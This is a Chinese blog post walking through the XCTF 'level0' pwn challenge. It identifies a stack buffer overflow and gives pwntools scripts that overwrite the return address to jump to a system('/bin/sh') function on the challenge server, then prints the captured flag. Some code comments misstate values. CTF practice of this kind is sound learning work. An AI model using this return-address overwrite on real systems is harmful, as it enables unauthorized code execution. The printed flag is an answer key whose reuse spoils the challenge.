攻防世界-level0

最新推荐文章于 2022-11-18 15:20:06 发布
最新推荐文章于 2022-11-18 15:20:06 发布
阅读量611 收藏 4
点赞数 2
分类专栏: Pwn-WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45771413/article/details/116033471
版权

探路

在这里插入图片描述

只有NX

试运行:

平平无奇

在这里插入图片描述

IDA

找到了读取越界的地方:

buf长度80,但是读取了512

在这里插入图片描述

解题不相关但是想记一下怕又忘了:寻找buf的地址,

ALT+T 查找字符串,选中最后的显示所有
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

学长support:

栈是存储局部变量的

使用完需要恢复成上一个函数的栈

结构如下:
数据

栈底地址(谁的?不吞掉后果如何)

rip:返回的地址

写脚本的目的:把buf占满,吞掉rbp,修改rip的地址,跳转到指定地址

在这里插入图片描述

做到这其实卡壳了,其实还有shift+f12这个老朋友○| ̄|_

在这里插入图片描述

敏感权限来了!!

瞅瞅在哪儿:地址40096

在这里插入图片描述

伪代码瞅一瞅:好家伙,直接system调用

写脚本的话直接把40096搞到rip位置就OK了

在这里插入图片描述

PS:如果想跳转指定地址的话,按空格,在G,输入跳转地址(G好久不用忘了……)

在这里插入图片描述

EXP

第一次,不会写脚本,就嫖下别人的学习学习咋回事……

脚本思路:

连接目标主机

编写针对栈溢出的payload:

填满字符串空间

覆盖掉rbp地址

rip的跳转地址换成/bin/sh的地址

发送payload

允许交互方便cat flag

EXP:

from pwn import *
r = remote("220.249.52.133", 40774) #题目给的地址和端口,用于连接
#本地测试可以用 r = process("./文件名")

payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596) 
    # 80个A填充buf,8个a覆盖rbp地址,最后把 /bin/bash所在地址接过来
    # p64 64位小端序存储

r.recvuntil("Hello, World\n") 
    #rec:接收; recvuntil:读到 Hello,world 截止

r.sendline(payload)
    #send发送命令; sendline发送一行命令,末尾自动补上\n

r.interactive()
    #inter允许交互

简化版exp:

from pwn import *
p = remote('220.249.52.133',38175)
p.send('a'*0x88+p64(0x400596))
p.interactive()

其它简单命令收集:

interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。

recv(numb=字节大小, timeout=default) : 接收指定字节数。

recvall() : 一直接收直到达到文件EOF。

recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。

recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。

recvrepeat(timeout=default) : 持续接受直到EOF或timeout。

跑脚本

在这里插入图片描述

看到了flag,直接猫它

在这里插入图片描述

flag

cyberpeace{7ea56a54d4b69f130822c612b3efaa01}

Holy-Pang
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1432
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1324
学习pwn开始,慢慢来不要急
攻防世界PWN-level0
Deeeelete的博客
11-12 2430
题目:level0 老规矩先进PE 查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数 比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO) 简单运行一遍,发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译 查看源码: 过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const
初学pwn-攻防世界(level0)
天柱的博客
08-27 982
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
Level 0到Level 5,自适应学习可分为哪些等级?
hayaqi0504的博客
09-06 3246
作者:胡天硕 发布时间: 2017-08-07 19:16 500182789.jpg 图片来源:摄图网 本文是胡天硕《揭秘自适应学习的背后原理》系列文章第二篇,第一篇为《一套自适应学习系统更应该包括那些环节?》。 当大家聊起AI与汽车的时候,第一个想到的是无人驾驶技术。当大家聊起AI与教育的时候,第一个往往想到的则是自适应学习。然而自适应学习就像无人驾驶一样,是分为不同的等级。较低等级的...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界——cookie
weixin_73668856的博客
11-18 207
网上大多用什么burp suite,这里也能直接用浏览器
攻防世界 Misc高手进阶区 - LooL
zgzhzywzd的博客
01-03 1118
题目描述:iVBORw0KGgoAAAANSUhEUgAAABwAAAAUCAIAAAARPMquAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAB3RJTUUH3goNFiAI385k0QAAAPVJREFU...... 下载附件是一张lol的图片,后面发现跟题目附件没有关系: 0x01 base64转图片 题目描述一段base代码,看见iVBO开头的基本就可以判定是图片了,因为解码后是PNG头。将代码粘贴复制到base64转图片网站,可以得到一张图片,保存为1....
攻防世界新手题(PWN——level0)
0pt1mus
12-19 1097
level0 转载自:superj.site的博客 0x00 首先,进行通过file判断附件文件类型。 判断是ELF文件。这时就可以通过checksec判断文件的保护措施。 得到只开启了执行保护,地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。 在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。 发现该题中用到了w...
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1842
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
【愚公系列】2022年01月 攻防世界-简单题-PWN-001(level0)
热门推荐
时光隧道
01-17 3万+
文章目录一、level0二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level0 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level0 checksec --file=level0 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界 level0 wp
PushSafe
10-23 557
纯新手教程 如有错误的地方 请各位大佬指出. 利用的主要工具 ida / olldly / Peil / python pwntools level0 首先收集一下文件信息 64位程序 Arch: amd64-64-little 程序位数 RELRO:No Relro 开启无法修改got表 Stack: No canry found 开启则无法直接覆盖EIP让程序任意跳转,跳转后会进行cookie校验;但这项保护可以被绕过 NX开着(开启则shellcode无法被执行) Pie: No
攻防世界 level0
weixin_45846085的博客
05-15 599
攻防世界第一题,很简单一个栈溢出。 首先拿到一个elf文件,把它放到ubuntu中检查一下 动态链接,小端序,64位只打开了NX保护,接下来看一下文件中引用的字符串 发现有system和/bin/sh,使用64位的IDA反编译一下。 只有一个脆弱函数,很明显了。 read出存在栈溢出漏洞,接下来寻找一下system和/bin/sh 发现存在后门函数,我们之接利用栈溢出漏洞控制程序跳转到callsystem处就可以getshell了。 gdb调试得到需要填充的垃圾数据 接下来看exp 运行脚本,成功
攻防世界pwn新手练习区——level0
smsyz2019的博客
10-31 1639
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
pwn-100(L-CTF-2016)--write up
ATFWUS的博客
03-11 917
文件下载地址: 链接:https://pan.baidu.com/s/1SkbJmjnCtZETaafLEIUuLQ 提取码:wjb0 前言:风萧萧兮雨萧萧,忆君兮,不知。 0x01.分析 checksec: 分析源码: 发现主要功能在sub_40063D,我们分析一下该函数,发现,该函数的功能是:向v1写满200字节,且一定要写...
攻防世界-get_post
最新发布
08-24
攻防世界中,"get_post" 是一个题目,要求学习如何使用GET和POST请求来传递参数。在这个题目中,首先让我们使用GET方式传递一个名为a,值为1的变量。我们只需要在URL窗口输入"/?a=1"并回车即可。接下来,又让我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值